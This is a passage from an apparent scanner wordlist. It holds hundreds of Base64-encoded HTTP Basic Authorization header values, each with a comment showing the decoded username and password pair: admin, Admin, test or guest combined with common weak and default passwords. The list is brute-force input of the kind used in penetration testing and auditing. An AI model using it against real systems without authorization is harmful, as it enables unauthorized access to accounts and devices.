166 | - "BASIC YWRtaW46MTEyMjMz" #admin:112233
167 | - "BASIC YWRtaW46MTIxMjEy" #admin:121212
168 | - "BASIC YWRtaW46MTIz" #admin:123
169 | - "BASIC YWRtaW46MTIzMTIz" #admin:123123
170 | - "BASIC YWRtaW46MTIzMzIx" #admin:123321
171 | - "BASIC YWRtaW46MTIzNA==" #admin:1234
172 | - "BASIC YWRtaW46MTIzNDU=" #admin:12345
173 | - "BASIC YWRtaW46MTIzNDU2" #admin:123456
174 | - "BASIC YWRtaW46MTIzNDU2Nw==" #admin:1234567
175 | - "BASIC YWRtaW46MTIzNDU2Nzg=" #admin:12345678
176 | - "BASIC YWRtaW46MTIzNDU2Nzg5" #admin:123456789
177 | - "BASIC YWRtaW46MTIzNDU2Nzg5MA==" #admin:1234567890
178 | - "BASIC YWRtaW46MTIzNGFiY2Q=" #admin:1234abcd
179 | - "BASIC YWRtaW46MTIzNHF3ZXI=" #admin:1234qwer
180 | - "BASIC YWRtaW46MTIzYWJj" #admin:123abc
181 | - "BASIC YWRtaW46MTIzYXNk" #admin:123asd
182 | - "BASIC YWRtaW46MTIzcXdl" #admin:123qwe
183 | - "BASIC YWRtaW46MTIzcXdlYXNk" #admin:123qweasd
184 | - "BASIC YWRtaW46MTJxd2Fzeng=" #admin:12qwaszx
185 | - "BASIC YWRtaW46MWUyZTNl" #admin:1e2e3e
186 | - "BASIC YWRtaW46MWUyZTNlNGU=" #admin:1e2e3e4e
187 | - "BASIC YWRtaW46MXEycTNx" #admin:1q2q3q
188 | - "BASIC YWRtaW46MXEycTNxNHE=" #admin:1q2q3q4q
189 | - "BASIC YWRtaW46MXEydzNl" #admin:1q2w3e
190 | - "BASIC YWRtaW46MXEydzNlNHI=" #admin:1q2w3e4r
191 | - "BASIC YWRtaW46MXEydzNlNHI1dA==" #admin:1q2w3e4r5t
192 | - "BASIC YWRtaW46MXFhejJ3c3g=" #admin:1qaz2wsx
193 | - "BASIC YWRtaW46MXFhejJ3c3gzZWRj" #admin:1qaz2wsx3edc
194 | - "BASIC YWRtaW46MXFhenhzdzI=" #admin:1qazxsw2
195 | - "BASIC YWRtaW46MXFhelhTV0A=" #admin:1qazXSW@
196 | - "BASIC YWRtaW46MXcycSFXQFE=" #admin:1w2q!W@Q
197 | - "BASIC YWRtaW46MXcydzN3" #admin:1w2w3w
198 | - "BASIC YWRtaW46MXcydzN3NHc=" #admin:1w2w3w4w
199 | - "BASIC YWRtaW46NTQzMjE=" #admin:54321
200 | - "BASIC YWRtaW46NjU0MzIx" #admin:654321
201 | - "BASIC YWRtaW46ODg4ODg4" #admin:888888
202 | - "BASIC YWRtaW46YQ==" #admin:a
203 | - "BASIC YWRtaW46YWJjMTIz" #admin:abc123
204 | - "BASIC YWRtaW46YWJjZDEyMzQ=" #admin:abcd1234
205 | - "BASIC YWRtaW46QWRtaW4=" #admin:Admin
206 | - "BASIC YWRtaW46YWRtaW4=" #admin:admin
207 | - "BASIC YWRtaW46YWRtaW4hQA==" #admin:admin!@
208 | - "BASIC YWRtaW46YWRtaW4x" #admin:admin1
209 | - "BASIC YWRtaW46YWRtaW4xMg==" #admin:admin12
210 | - "BASIC YWRtaW46YWRtaW4xMjM=" #admin:admin123
211 | - "BASIC YWRtaW46YWRtaW4xMjM0NTY=" #admin:admin123456
212 | - "BASIC YWRtaW46YWRtaW5pc3RyYXRvcg==" #admin:administrator
213 | - "BASIC YWRtaW46YWxwaW5l" #admin:alpine
214 | - "BASIC YWRtaW46YXNkMTIz" #admin:asd123
215 | - "BASIC YWRtaW46YXNkZg==" #admin:asdf
216 | - "BASIC YWRtaW46YXNkZjEyMzQ=" #admin:asdf1234
217 | - "BASIC YWRtaW46YXNkZmdo" #admin:asdfgh
218 | - "BASIC YWRtaW46Y2VudG9z" #admin:centos
219 | - "BASIC YWRtaW46Y2hhbmdlbWU=" #admin:changeme
220 | - "BASIC YWRtaW46Y2lzY28=" #admin:cisco
221 | - "BASIC YWRtaW46Y2lzY28xMjM=" #admin:cisco123
222 | - "BASIC YWRtaW46ZGVmYXVsdA==" #admin:default
223 | - "BASIC YWRtaW46aWRjIUA=" #admin:idc!@
224 | - "BASIC YWRtaW46amlhbWltYQ==" #admin:jiamima
225 | - "BASIC YWRtaW46bGV0bWVpbg==" #admin:letmein
226 | - "BASIC YWRtaW46bGludXg=" #admin:linux
227 | - "BASIC YWRtaW46bWFuYWdlcg==" #admin:manager
228 | - "BASIC YWRtaW46bWFzdGVy" #admin:master
229 | - "BASIC YWRtaW46b3JhY2xl" #admin:oracle
230 | - "BASIC YWRtaW46cEAkJHcwcmQ=" #admin:p@$$w0rd
231 | - "BASIC YWRtaW46UEBzc3cwcmQ=" #admin:P@ssw0rd
232 | - "BASIC YWRtaW46cEBzc3cwcmQ=" #admin:p@ssw0rd
233 | - "BASIC YWRtaW46UEBzc3cwcmQh" #admin:P@ssw0rd!
234 | - "BASIC YWRtaW46cEBzc3dvcmQ=" #admin:p@ssword
235 | - "BASIC YWRtaW46cGE1NXcwcmQ=" #admin:pa55w0rd
236 | - "BASIC YWRtaW46cGFzcw==" #admin:pass
237 | - "BASIC YWRtaW46cGFzc3cwcmQ=" #admin:passw0rd
238 | - "BASIC YWRtaW46cGFzc3dvcmQ=" #admin:password
239 | - "BASIC YWRtaW46cGFzc3dvcmQxMjM=" #admin:password123
240 | - "BASIC YWRtaW46cTF3MmUz" #admin:q1w2e3
241 | - "BASIC YWRtaW46cTF3MmUzcjQ=" #admin:q1w2e3r4
242 | - "BASIC YWRtaW46cTF3MmUzcjR0NQ==" #admin:q1w2e3r4t5
243 | - "BASIC YWRtaW46cWF6d3N4ZWRj" #admin:qazwsxedc
244 | - "BASIC YWRtaW46cXdlMTIz" #admin:qwe123
245 | - "BASIC YWRtaW46cXdlcjEyMzQ=" #admin:qwer1234
246 | - "BASIC YWRtaW46cXdlcnR5" #admin:qwerty
247 | - "BASIC YWRtaW46cXdlcnR5MTIz" #admin:qwerty123
248 | - "BASIC YWRtaW46cmVkaGF0" #admin:redhat
249 | - "BASIC YWRtaW46cm9vdA==" #admin:root
250 | - "BASIC YWRtaW46cm9vdDEyMw==" #admin:root123
251 | - "BASIC YWRtaW46cm9vdDEyMzQ=" #admin:root1234
252 | - "BASIC YWRtaW46cm9vdEAxMjM=" #admin:root@123
253 | - "BASIC YWRtaW46cm9vdHJvb3Q=" #admin:rootroot
254 | - "BASIC YWRtaW46c2VydmVy" #admin:server
255 | - "BASIC YWRtaW46c3VwZXJ1c2Vy" #admin:superuser
256 | - "BASIC YWRtaW46c3lzdGVt" #admin:system
257 | - "BASIC YWRtaW46VGVzdA==" #admin:Test
258 | - "BASIC YWRtaW46dGVzdA==" #admin:test
259 | - "BASIC YWRtaW46dGVzdDEyMw==" #admin:test123
260 | - "BASIC YWRtaW46dG9vcg==" #admin:toor
261 | - "BASIC YWRtaW46dWJudA==" #admin:ubnt
262 | - "BASIC YWRtaW46dWJ1bnR1" #admin:ubuntu
263 | - "BASIC YWRtaW46VXNlcg==" #admin:User
264 | - "BASIC YWRtaW46dXNlcg==" #admin:user
265 | - "BASIC YWRtaW46dm13YXJl" #admin:vmware
266 | - "BASIC YWRtaW46d2VsY29tZQ==" #admin:welcome
267 | - "BASIC YWRtaW46d3ViYW8=" #admin:wubao
268 | - "BASIC YWRtaW46emFxMTJ3c3g=" #admin:zaq12wsx
269 | - "BASIC YWRtaW46enhjdmJu" #admin:zxcvbn
270 | - "BASIC YWRtaW46enhjdmJubQ==" #admin:zxcvbnm
271 | - "BASIC YWRtaW46Y2hhbmdlaXQ=" #admin:changeit
272 | - "BASIC QWRtaW46" #Admin:
273 | - "BASIC QWRtaW46IVFBWjJ3c3g=" #Admin:!QAZ2wsx
274 | - "BASIC QWRtaW46IXFhekB3c3g=" #Admin:!qaz@wsx
275 | - "BASIC QWRtaW46MDAwMA==" #Admin:0000
276 | - "BASIC QWRtaW46MDAwMDAw" #Admin:000000
277 | - "BASIC QWRtaW46MDAwMDAwMA==" #Admin:0000000
278 | - "BASIC QWRtaW46MDAwMDAwMDA=" #Admin:00000000
279 | - "BASIC QWRtaW46MDk4NzY1NDMyMQ==" #Admin:0987654321
280 | - "BASIC QWRtaW46MA==" #Admin:0
281 | - "BASIC QWRtaW46MQ==" #Admin:1
282 | - "BASIC QWRtaW46Mg==" #Admin:2
283 | - "BASIC QWRtaW46Mw==" #Admin:3
284 | - "BASIC QWRtaW46NA==" #Admin:4
285 | - "BASIC QWRtaW46NQ==" #Admin:5
286 | - "BASIC QWRtaW46Ng==" #Admin:6
287 | - "BASIC QWRtaW46Nw==" #Admin:7
288 | - "BASIC QWRtaW46OA==" #Admin:8
289 | - "BASIC QWRtaW46OQ==" #Admin:9
290 | - "BASIC QWRtaW46MTExMQ==" #Admin:1111
291 | - "BASIC QWRtaW46MTExMTE=" #Admin:11111
292 | - "BASIC QWRtaW46MTExMTEx" #Admin:111111
293 | - "BASIC QWRtaW46MTExMTExMQ==" #Admin:1111111
294 | - "BASIC QWRtaW46MTExMTExMTE=" #Admin:11111111
295 | - "BASIC QWRtaW46MTEyMjMz" #Admin:112233
296 | - "BASIC QWRtaW46MTIxMjEy" #Admin:121212
297 | - "BASIC QWRtaW46MTIz" #Admin:123
298 | - "BASIC QWRtaW46MTIzMTIz" #Admin:123123
299 | - "BASIC QWRtaW46MTIzMzIx" #Admin:123321
300 | - "BASIC QWRtaW46MTIzNA==" #Admin:1234
301 | - "BASIC QWRtaW46MTIzNDU=" #Admin:12345
302 | - "BASIC QWRtaW46MTIzNDU2" #Admin:123456
303 | - "BASIC QWRtaW46MTIzNDU2Nw==" #Admin:1234567
304 | - "BASIC QWRtaW46MTIzNDU2Nzg=" #Admin:12345678
305 | - "BASIC QWRtaW46MTIzNDU2Nzg5" #Admin:123456789
306 | - "BASIC QWRtaW46MTIzNDU2Nzg5MA==" #Admin:1234567890
307 | - "BASIC QWRtaW46MTIzNGFiY2Q=" #Admin:1234abcd
308 | - "BASIC QWRtaW46MTIzNHF3ZXI=" #Admin:1234qwer
309 | - "BASIC QWRtaW46MTIzYWJj" #Admin:123abc
310 | - "BASIC QWRtaW46MTIzYXNk" #Admin:123asd
311 | - "BASIC QWRtaW46MTIzcXdl" #Admin:123qwe
312 | - "BASIC QWRtaW46MTIzcXdlYXNk" #Admin:123qweasd
313 | - "BASIC QWRtaW46MTJxd2Fzeng=" #Admin:12qwaszx
314 | - "BASIC QWRtaW46MWUyZTNl" #Admin:1e2e3e
315 | - "BASIC QWRtaW46MWUyZTNlNGU=" #Admin:1e2e3e4e
316 | - "BASIC QWRtaW46MXEycTNx" #Admin:1q2q3q
317 | - "BASIC QWRtaW46MXEycTNxNHE=" #Admin:1q2q3q4q
318 | - "BASIC QWRtaW46MXEydzNl" #Admin:1q2w3e
319 | - "BASIC QWRtaW46MXEydzNlNHI=" #Admin:1q2w3e4r
320 | - "BASIC QWRtaW46MXEydzNlNHI1dA==" #Admin:1q2w3e4r5t
321 | - "BASIC QWRtaW46MXFhejJ3c3g=" #Admin:1qaz2wsx
322 | - "BASIC QWRtaW46MXFhejJ3c3gzZWRj" #Admin:1qaz2wsx3edc
323 | - "BASIC QWRtaW46MXFhenhzdzI=" #Admin:1qazxsw2
324 | - "BASIC QWRtaW46MXFhelhTV0A=" #Admin:1qazXSW@
325 | - "BASIC QWRtaW46MXcycSFXQFE=" #Admin:1w2q!W@Q
326 | - "BASIC QWRtaW46MXcydzN3" #Admin:1w2w3w
327 | - "BASIC QWRtaW46MXcydzN3NHc=" #Admin:1w2w3w4w
328 | - "BASIC QWRtaW46NTQzMjE=" #Admin:54321
329 | - "BASIC QWRtaW46NjU0MzIx" #Admin:654321
330 | - "BASIC QWRtaW46ODg4ODg4" #Admin:888888
331 | - "BASIC QWRtaW46YQ==" #Admin:a
332 | - "BASIC QWRtaW46YWJjMTIz" #Admin:abc123
333 | - "BASIC QWRtaW46YWJjZDEyMzQ=" #Admin:abcd1234
334 | - "BASIC QWRtaW46QWRtaW4=" #Admin:Admin
335 | - "BASIC QWRtaW46YWRtaW4=" #Admin:admin
336 | - "BASIC QWRtaW46YWRtaW4hQA==" #Admin:admin!@
337 | - "BASIC QWRtaW46YWRtaW4x" #Admin:admin1
338 | - "BASIC QWRtaW46YWRtaW4xMg==" #Admin:admin12
339 | - "BASIC QWRtaW46YWRtaW4xMjM=" #Admin:admin123
340 | - "BASIC QWRtaW46YWRtaW4xMjM0NTY=" #Admin:admin123456
341 | - "BASIC QWRtaW46YWRtaW5pc3RyYXRvcg==" #Admin:administrator
342 | - "BASIC QWRtaW46YWxwaW5l" #Admin:alpine
343 | - "BASIC QWRtaW46YXNkMTIz" #Admin:asd123
344 | - "BASIC QWRtaW46YXNkZg==" #Admin:asdf
345 | - "BASIC QWRtaW46YXNkZjEyMzQ=" #Admin:asdf1234
346 | - "BASIC QWRtaW46YXNkZmdo" #Admin:asdfgh
347 | - "BASIC QWRtaW46Y2VudG9z" #Admin:centos
348 | - "BASIC QWRtaW46Y2hhbmdlbWU=" #Admin:changeme
349 | - "BASIC QWRtaW46Y2lzY28=" #Admin:cisco
350 | - "BASIC QWRtaW46Y2lzY28xMjM=" #Admin:cisco123
351 | - "BASIC QWRtaW46ZGVmYXVsdA==" #Admin:default
352 | - "BASIC QWRtaW46aWRjIUA=" #Admin:idc!@
353 | - "BASIC QWRtaW46amlhbWltYQ==" #Admin:jiamima
354 | - "BASIC QWRtaW46bGV0bWVpbg==" #Admin:letmein
355 | - "BASIC QWRtaW46bGludXg=" #Admin:linux
356 | - "BASIC QWRtaW46bWFuYWdlcg==" #Admin:manager
357 | - "BASIC QWRtaW46bWFzdGVy" #Admin:master
358 | - "BASIC QWRtaW46b3JhY2xl" #Admin:oracle
359 | - "BASIC QWRtaW46cEAkJHcwcmQ=" #Admin:p@$$w0rd
360 | - "BASIC QWRtaW46UEBzc3cwcmQ=" #Admin:P@ssw0rd
361 | - "BASIC QWRtaW46cEBzc3cwcmQ=" #Admin:p@ssw0rd
362 | - "BASIC QWRtaW46UEBzc3cwcmQh" #Admin:P@ssw0rd!
363 | - "BASIC QWRtaW46cEBzc3dvcmQ=" #Admin:p@ssword
364 | - "BASIC QWRtaW46cGE1NXcwcmQ=" #Admin:pa55w0rd
365 | - "BASIC QWRtaW46cGFzcw==" #Admin:pass
366 | - "BASIC QWRtaW46cGFzc3cwcmQ=" #Admin:passw0rd
367 | - "BASIC QWRtaW46cGFzc3dvcmQ=" #Admin:password
368 | - "BASIC QWRtaW46cGFzc3dvcmQxMjM=" #Admin:password123
369 | - "BASIC QWRtaW46cTF3MmUz" #Admin:q1w2e3
370 | - "BASIC QWRtaW46cTF3MmUzcjQ=" #Admin:q1w2e3r4
371 | - "BASIC QWRtaW46cTF3MmUzcjR0NQ==" #Admin:q1w2e3r4t5
372 | - "BASIC QWRtaW46cWF6d3N4ZWRj" #Admin:qazwsxedc
373 | - "BASIC QWRtaW46cXdlMTIz" #Admin:qwe123
374 | - "BASIC QWRtaW46cXdlcjEyMzQ=" #Admin:qwer1234
375 | - "BASIC QWRtaW46cXdlcnR5" #Admin:qwerty
376 | - "BASIC QWRtaW46cXdlcnR5MTIz" #Admin:qwerty123
377 | - "BASIC QWRtaW46cmVkaGF0" #Admin:redhat
378 | - "BASIC QWRtaW46cm9vdA==" #Admin:root
379 | - "BASIC QWRtaW46cm9vdDEyMw==" #Admin:root123
380 | - "BASIC QWRtaW46cm9vdDEyMzQ=" #Admin:root1234
381 | - "BASIC QWRtaW46cm9vdEAxMjM=" #Admin:root@123
382 | - "BASIC QWRtaW46cm9vdHJvb3Q=" #Admin:rootroot
383 | - "BASIC QWRtaW46c2VydmVy" #Admin:server
384 | - "BASIC QWRtaW46c3VwZXJ1c2Vy" #Admin:superuser
385 | - "BASIC QWRtaW46c3lzdGVt" #Admin:system
386 | - "BASIC QWRtaW46VGVzdA==" #Admin:Test
387 | - "BASIC QWRtaW46dGVzdA==" #Admin:test
388 | - "BASIC QWRtaW46dGVzdDEyMw==" #Admin:test123
389 | - "BASIC QWRtaW46dG9vcg==" #Admin:toor
390 | - "BASIC QWRtaW46dWJudA==" #Admin:ubnt
391 | - "BASIC QWRtaW46dWJ1bnR1" #Admin:ubuntu
392 | - "BASIC QWRtaW46VXNlcg==" #Admin:User
393 | - "BASIC QWRtaW46dXNlcg==" #Admin:user
394 | - "BASIC QWRtaW46dm13YXJl" #Admin:vmware
395 | - "BASIC QWRtaW46d2VsY29tZQ==" #Admin:welcome
396 | - "BASIC QWRtaW46d3ViYW8=" #Admin:wubao
397 | - "BASIC QWRtaW46emFxMTJ3c3g=" #Admin:zaq12wsx
398 | - "BASIC QWRtaW46enhjdmJu" #Admin:zxcvbn
399 | - "BASIC QWRtaW46enhjdmJubQ==" #Admin:zxcvbnm
400 | - "BASIC QWRtaW46Y2hhbmdlaXQ=" #Admin:changeit
401 | - "BASIC dGVzdDo=" #test:
402 | - "BASIC dGVzdDohUUFaMndzeA==" #test:!QAZ2wsx
403 | - "BASIC dGVzdDohcWF6QHdzeA==" #test:!qaz@wsx
404 | - "BASIC dGVzdDowMDAw" #test:0000
405 | - "BASIC dGVzdDowMDAwMDA=" #test:000000
406 | - "BASIC dGVzdDowMDAwMDAw" #test:0000000
407 | - "BASIC dGVzdDowMDAwMDAwMA==" #test:00000000
408 | - "BASIC dGVzdDowOTg3NjU0MzIx" #test:0987654321
409 | - "BASIC dGVzdDow" #test:0
410 | - "BASIC dGVzdDox" #test:1
411 | - "BASIC dGVzdDoy" #test:2
412 | - "BASIC dGVzdDoz" #test:3
413 | - "BASIC dGVzdDo0" #test:4
414 | - "BASIC dGVzdDo1" #test:5
415 | - "BASIC dGVzdDo2" #test:6
416 | - "BASIC dGVzdDo3" #test:7
417 | - "BASIC dGVzdDo4" #test:8
418 | - "BASIC dGVzdDo5" #test:9
419 | - "BASIC dGVzdDoxMTEx" #test:1111
420 | - "BASIC dGVzdDoxMTExMQ==" #test:11111
421 | - "BASIC dGVzdDoxMTExMTE=" #test:111111
422 | - "BASIC dGVzdDoxMTExMTEx" #test:1111111
423 | - "BASIC dGVzdDoxMTExMTExMQ==" #test:11111111
424 | - "BASIC dGVzdDoxMTIyMzM=" #test:112233
425 | - "BASIC dGVzdDoxMjEyMTI=" #test:121212
426 | - "BASIC dGVzdDoxMjM=" #test:123
427 | - "BASIC dGVzdDoxMjMxMjM=" #test:123123
428 | - "BASIC dGVzdDoxMjMzMjE=" #test:123321
429 | - "BASIC dGVzdDoxMjM0" #test:1234
430 | - "BASIC dGVzdDoxMjM0NQ==" #test:12345
431 | - "BASIC dGVzdDoxMjM0NTY=" #test:123456
432 | - "BASIC dGVzdDoxMjM0NTY3" #test:1234567
433 | - "BASIC dGVzdDoxMjM0NTY3OA==" #test:12345678
434 | - "BASIC dGVzdDoxMjM0NTY3ODk=" #test:123456789
435 | - "BASIC dGVzdDoxMjM0NTY3ODkw" #test:1234567890
436 | - "BASIC dGVzdDoxMjM0YWJjZA==" #test:1234abcd
437 | - "BASIC dGVzdDoxMjM0cXdlcg==" #test:1234qwer
438 | - "BASIC dGVzdDoxMjNhYmM=" #test:123abc
439 | - "BASIC dGVzdDoxMjNhc2Q=" #test:123asd
440 | - "BASIC dGVzdDoxMjNxd2U=" #test:123qwe
441 | - "BASIC dGVzdDoxMjNxd2Vhc2Q=" #test:123qweasd
442 | - "BASIC dGVzdDoxMnF3YXN6eA==" #test:12qwaszx
443 | - "BASIC dGVzdDoxZTJlM2U=" #test:1e2e3e
444 | - "BASIC dGVzdDoxZTJlM2U0ZQ==" #test:1e2e3e4e
445 | - "BASIC dGVzdDoxcTJxM3E=" #test:1q2q3q
446 | - "BASIC dGVzdDoxcTJxM3E0cQ==" #test:1q2q3q4q
447 | - "BASIC dGVzdDoxcTJ3M2U=" #test:1q2w3e
448 | - "BASIC dGVzdDoxcTJ3M2U0cg==" #test:1q2w3e4r
449 | - "BASIC dGVzdDoxcTJ3M2U0cjV0" #test:1q2w3e4r5t
450 | - "BASIC dGVzdDoxcWF6MndzeA==" #test:1qaz2wsx
451 | - "BASIC dGVzdDoxcWF6MndzeDNlZGM=" #test:1qaz2wsx3edc
452 | - "BASIC dGVzdDoxcWF6eHN3Mg==" #test:1qazxsw2
453 | - "BASIC dGVzdDoxcWF6WFNXQA==" #test:1qazXSW@
454 | - "BASIC dGVzdDoxdzJxIVdAUQ==" #test:1w2q!W@Q
455 | - "BASIC dGVzdDoxdzJ3M3c=" #test:1w2w3w
456 | - "BASIC dGVzdDoxdzJ3M3c0dw==" #test:1w2w3w4w
457 | - "BASIC dGVzdDo1NDMyMQ==" #test:54321
458 | - "BASIC dGVzdDo2NTQzMjE=" #test:654321
459 | - "BASIC dGVzdDo4ODg4ODg=" #test:888888
460 | - "BASIC dGVzdDph" #test:a
461 | - "BASIC dGVzdDphYmMxMjM=" #test:abc123
462 | - "BASIC dGVzdDphYmNkMTIzNA==" #test:abcd1234
463 | - "BASIC dGVzdDpBZG1pbg==" #test:Admin
464 | - "BASIC dGVzdDphZG1pbg==" #test:admin
465 | - "BASIC dGVzdDphZG1pbiFA" #test:admin!@
466 | - "BASIC dGVzdDphZG1pbjE=" #test:admin1
467 | - "BASIC dGVzdDphZG1pbjEy" #test:admin12
468 | - "BASIC dGVzdDphZG1pbjEyMw==" #test:admin123
469 | - "BASIC dGVzdDphZG1pbjEyMzQ1Ng==" #test:admin123456
470 | - "BASIC dGVzdDphZG1pbmlzdHJhdG9y" #test:administrator
471 | - "BASIC dGVzdDphbHBpbmU=" #test:alpine
472 | - "BASIC dGVzdDphc2QxMjM=" #test:asd123
473 | - "BASIC dGVzdDphc2Rm" #test:asdf
474 | - "BASIC dGVzdDphc2RmMTIzNA==" #test:asdf1234
475 | - "BASIC dGVzdDphc2RmZ2g=" #test:asdfgh
476 | - "BASIC dGVzdDpjZW50b3M=" #test:centos
477 | - "BASIC dGVzdDpjaGFuZ2VtZQ==" #test:changeme
478 | - "BASIC dGVzdDpjaXNjbw==" #test:cisco
479 | - "BASIC dGVzdDpjaXNjbzEyMw==" #test:cisco123
480 | - "BASIC dGVzdDpkZWZhdWx0" #test:default
481 | - "BASIC dGVzdDppZGMhQA==" #test:idc!@
482 | - "BASIC dGVzdDpqaWFtaW1h" #test:jiamima
483 | - "BASIC dGVzdDpsZXRtZWlu" #test:letmein
484 | - "BASIC dGVzdDpsaW51eA==" #test:linux
485 | - "BASIC dGVzdDptYW5hZ2Vy" #test:manager
486 | - "BASIC dGVzdDptYXN0ZXI=" #test:master
487 | - "BASIC dGVzdDpvcmFjbGU=" #test:oracle
488 | - "BASIC dGVzdDpwQCQkdzByZA==" #test:p@$$w0rd
489 | - "BASIC dGVzdDpQQHNzdzByZA==" #test:P@ssw0rd
490 | - "BASIC dGVzdDpwQHNzdzByZA==" #test:p@ssw0rd
491 | - "BASIC dGVzdDpQQHNzdzByZCE=" #test:P@ssw0rd!
492 | - "BASIC dGVzdDpwQHNzd29yZA==" #test:p@ssword
493 | - "BASIC dGVzdDpwYTU1dzByZA==" #test:pa55w0rd
494 | - "BASIC dGVzdDpwYXNz" #test:pass
495 | - "BASIC dGVzdDpwYXNzdzByZA==" #test:passw0rd
496 | - "BASIC dGVzdDpwYXNzd29yZA==" #test:password
497 | - "BASIC dGVzdDpwYXNzd29yZDEyMw==" #test:password123
498 | - "BASIC dGVzdDpxMXcyZTM=" #test:q1w2e3
499 | - "BASIC dGVzdDpxMXcyZTNyNA==" #test:q1w2e3r4
500 | - "BASIC dGVzdDpxMXcyZTNyNHQ1" #test:q1w2e3r4t5
501 | - "BASIC dGVzdDpxYXp3c3hlZGM=" #test:qazwsxedc
502 | - "BASIC dGVzdDpxd2UxMjM=" #test:qwe123
503 | - "BASIC dGVzdDpxd2VyMTIzNA==" #test:qwer1234
504 | - "BASIC dGVzdDpxd2VydHk=" #test:qwerty
505 | - "BASIC dGVzdDpxd2VydHkxMjM=" #test:qwerty123
506 | - "BASIC dGVzdDpyZWRoYXQ=" #test:redhat
507 | - "BASIC dGVzdDpyb290" #test:root
508 | - "BASIC dGVzdDpyb290MTIz" #test:root123
509 | - "BASIC dGVzdDpyb290MTIzNA==" #test:root1234
510 | - "BASIC dGVzdDpyb290QDEyMw==" #test:root@123
511 | - "BASIC dGVzdDpyb290cm9vdA==" #test:rootroot
512 | - "BASIC dGVzdDpzZXJ2ZXI=" #test:server
513 | - "BASIC dGVzdDpzdXBlcnVzZXI=" #test:superuser
514 | - "BASIC dGVzdDpzeXN0ZW0=" #test:system
515 | - "BASIC dGVzdDpUZXN0" #test:Test
516 | - "BASIC dGVzdDp0ZXN0" #test:test
517 | - "BASIC dGVzdDp0ZXN0MTIz" #test:test123
518 | - "BASIC dGVzdDp0b29y" #test:toor
519 | - "BASIC dGVzdDp1Ym50" #test:ubnt
520 | - "BASIC dGVzdDp1YnVudHU=" #test:ubuntu
521 | - "BASIC dGVzdDpVc2Vy" #test:User
522 | - "BASIC dGVzdDp1c2Vy" #test:user
523 | - "BASIC dGVzdDp2bXdhcmU=" #test:vmware
524 | - "BASIC dGVzdDp3ZWxjb21l" #test:welcome
525 | - "BASIC dGVzdDp3dWJhbw==" #test:wubao
526 | - "BASIC dGVzdDp6YXExMndzeA==" #test:zaq12wsx
527 | - "BASIC dGVzdDp6eGN2Ym4=" #test:zxcvbn
528 | - "BASIC dGVzdDp6eGN2Ym5t" #test:zxcvbnm
529 | - "BASIC dGVzdDpjaGFuZ2VpdA==" #test:changeit
530 | - "BASIC Z3Vlc3Q6" #guest:
531 | - "BASIC Z3Vlc3Q6IVFBWjJ3c3g=" #guest:!QAZ2wsx
532 | - "BASIC Z3Vlc3Q6IXFhekB3c3g=" #guest:!qaz@wsx
533 | - "BASIC Z3Vlc3Q6MDAwMA==" #guest:0000
534 | - "BASIC Z3Vlc3Q6MDAwMDAw" #guest:000000
535 | - "BASIC Z3Vlc3Q6MDAwMDAwMA==" #guest:0000000
536 | - "BASIC Z3Vlc3Q6MDAwMDAwMDA=" #guest:00000000
537 | - "BASIC Z3Vlc3Q6MDk4NzY1NDMyMQ==" #guest:0987654321
538 | - "BASIC Z3Vlc3Q6MA==" #guest:0
539 | - "BASIC Z3Vlc3Q6MQ==" #guest:1
540 | - "BASIC Z3Vlc3Q6Mg==" #guest:2
541 | - "BASIC Z3Vlc3Q6Mw==" #guest:3
542 | - "BASIC Z3Vlc3Q6NA==" #guest:4
543 | - "BASIC Z3Vlc3Q6NQ==" #guest:5
544 | - "BASIC Z3Vlc3Q6Ng==" #guest:6
545 | - "BASIC Z3Vlc3Q6Nw==" #guest:7
546 | - "BASIC Z3Vlc3Q6OA==" #guest:8
547 | - "BASIC Z3Vlc3Q6OQ==" #guest:9
548 | - "BASIC Z3Vlc3Q6MTExMQ==" #guest:1111
549 | - "BASIC Z3Vlc3Q6MTExMTE=" #guest:11111
550 | - "BASIC Z3Vlc3Q6MTExMTEx" #guest:111111
551 | - "BASIC Z3Vlc3Q6MTExMTExMQ==" #guest:1111111
552 | - "BASIC Z3Vlc3Q6MTExMTExMTE=" #guest:11111111
553 | - "BASIC Z3Vlc3Q6MTEyMjMz" #guest:112233
554 | - "BASIC Z3Vlc3Q6MTIxMjEy" #guest:121212
555 | - "BASIC Z3Vlc3Q6MTIz" #guest:123
556 | - "BASIC Z3Vlc3Q6MTIzMTIz" #guest:123123
557 | - "BASIC Z3Vlc3Q6MTIzMzIx" #guest:123321
558 | - "BASIC Z3Vlc3Q6MTIzNA==" #guest:1234
559 | - "BASIC Z3Vlc3Q6MTIzNDU=" #guest:12345
560 | - "BASIC Z3Vlc3Q6MTIzNDU2" #guest:123456
561 | - "BASIC Z3Vlc3Q6MTIzNDU2Nw==" #guest:1234567
562 | - "BASIC Z3Vlc3Q6MTIzNDU2Nzg=" #guest:12345678
563 | - "BASIC Z3Vlc3Q6MTIzNDU2Nzg5" #guest:123456789
564 | - "BASIC Z3Vlc3Q6MTIzNDU2Nzg5MA==" #guest:1234567890
565 | - "BASIC Z3Vlc3Q6MTIzNGFiY2Q=" #guest:1234abcd
566 | - "BASIC Z3Vlc3Q6MTIzNHF3ZXI=" #guest:1234qwer
567 | - "BASIC Z3Vlc3Q6MTIzYWJj" #guest:123abc
568 | - "BASIC Z3Vlc3Q6MTIzYXNk" #guest:123asd
569 | - "BASIC Z3Vlc3Q6MTIzcXdl" #guest:123qwe
570 | - "BASIC Z3Vlc3Q6MTIzcXdlYXNk" #guest:123qweasd
571 | - "BASIC Z3Vlc3Q6MTJxd2Fzeng=" #guest:12qwaszx
572 | - "BASIC Z3Vlc3Q6MWUyZTNl" #guest:1e2e3e
573 | - "BASIC Z3Vlc3Q6MWUyZTNlNGU=" #guest:1e2e3e4e
574 | - "BASIC Z3Vlc3Q6MXEycTNx" #guest:1q2q3q
575 | - "BASIC Z3Vlc3Q6MXEycTNxNHE=" #guest:1q2q3q4q
576 | - "BASIC Z3Vlc3Q6MXEydzNl" #guest:1q2w3e
577 | - "BASIC Z3Vlc3Q6MXEydzNlNHI=" #guest:1q2w3e4r
578 | - "BASIC Z3Vlc3Q6MXEydzNlNHI1dA==" #guest:1q2w3e4r5t
579 | - "BASIC Z3Vlc3Q6MXFhejJ3c3g=" #guest:1qaz2wsx
580 | - "BASIC Z3Vlc3Q6MXFhejJ3c3gzZWRj" #guest:1qaz2wsx3edc
581 | - "BASIC Z3Vlc3Q6MXFhenhzdzI=" #guest:1qazxsw2
582 | - "BASIC Z3Vlc3Q6MXFhelhTV0A=" #guest:1qazXSW@
583 | - "BASIC Z3Vlc3Q6MXcycSFXQFE=" #guest:1w2q!W@Q
